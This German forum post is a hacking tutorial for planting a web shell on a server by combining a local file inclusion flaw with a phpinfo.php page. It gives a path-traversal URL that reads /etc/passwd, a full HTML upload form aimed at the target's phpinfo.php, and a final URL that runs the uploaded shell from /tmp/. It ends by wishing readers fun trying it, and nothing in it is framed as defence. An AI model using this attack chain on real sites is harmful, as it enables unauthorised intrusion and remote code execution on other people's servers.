Keine Antworten in diesem Thema

[InternetFreak]

Shell-Upload über LFI & phpinfo.php

 

In diesem Tutorial erkläre ich euch wie ihr eine Shell auf einen Server hochladen könnt, indem ihr eine LFI in verbindung mit der Phpinfo-Site ausnutzt.

 

 

1. Benötigte Angriffspunkte

 

Gehen wir davon aus wir hätten eine LFI auf einer Website entdeckt.

Die URL könnte Beispielsweise so aussehen:

http://www.unsichere-website.de/index.php?page=../../../../../../../../../../etc/passwd

Die aufgerufene Datei sollte jetz auf der Website ausgegeben werden:

 

Jetzt vergewissern wir und noch ob eine Datei namens phpinfo.php existiert:

http://www.unsichere-website.de/phpinfo.php

Diese sollte in etwa so aussehen:

 

 

2. Upload einer Shell

 

Um jetzt unsere Shell hochzuladen benutzen wir dieses HTML-Dokument:

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>phpinfo.php - Shell Upload</title>
<style type="text/css">body { background-color: #000000; color: #ffffff; text-align: center; }</style>
</head>
<body>
<h1> After uploading , check the phpinfo.php and search your shell name! </h1><br /><br /><br />
<form action="http://www.unsichere-website.de/phpinfo.php" method="post" enctype="multipart/form-data">
<label for="file">Shell:</label>
<input type="file" name="file" id="file">
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>

Wir wählen die Shell aus, welche wir auf den Server hochladen wollen und klicken auf Submit:

 

Wenn alles funktioniert hat sollten wir jetzt den Namen unserer Shell auf der Phpinfo-Site finden können:

 

Wir wir erkennen können, wurde die Shell in das Verzeichnis /tmp/ geladen.

Jetzt müssen wir unsere Shell nurnoch über die LFI aufrufen:

http://www.unsichere-website.de/index.php?page=../../../../../../../../../../tmp/shell.php

Viel Spaß beim ausprobieren.

Bearbeitet von InternetFreak, 15 June 2015 - 02:03 Uhr.